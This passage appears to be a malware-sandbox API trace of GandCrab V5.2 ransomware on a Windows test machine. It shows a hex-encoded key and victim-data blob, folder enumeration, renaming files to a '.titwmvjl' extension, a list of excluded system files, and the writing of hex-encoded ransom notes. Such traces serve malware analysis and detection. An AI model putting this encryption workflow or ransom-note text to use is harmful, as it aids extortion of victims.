\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.279] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0073.279] CloseHandle (hObject=0x2bc) returned 1 [0073.280] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.280] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.280] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x24e)) [0073.280] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.280] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.280] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.281] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.281] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0073.281] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.281] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.281] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 58 [0073.281] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0073.281] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503938 [0073.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.281] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.282] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.282] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.282] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.282] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock" [0073.282] lstrlenW (lpString=".titwmvjl") returned 9 [0073.282] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.282] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.282] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 91 [0073.282] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.282] lstrlenW (lpString=".lock") returned 5 [0073.282] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.282] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.282] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.282] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.283] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.283] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.283] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt" [0073.283] lstrlenW (lpString=".titwmvjl") returned 9 [0073.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt") returned 78 [0073.283] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.283] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 87 [0073.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt") returned 78 [0073.283] lstrlenW (lpString=".txt") returned 4 [0073.283] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.283] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.283] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.283] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt") returned 78 [0073.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\TITWMVJL-DECRYPT.txt") returned 78 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.283] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.284] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.284] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.284] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0073.284] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0073.292] CloseHandle (hObject=0x2bc) returned 1 [0073.292] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0073.292] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0073.292] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0073.292] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher Building Blocks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0073.292] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0073.292] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.293] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.293] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.293] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.294] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.294] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.294] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.294] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\TITWMVJL-DECRYPT.txt") returned 95 [0073.294] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0073.295] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x6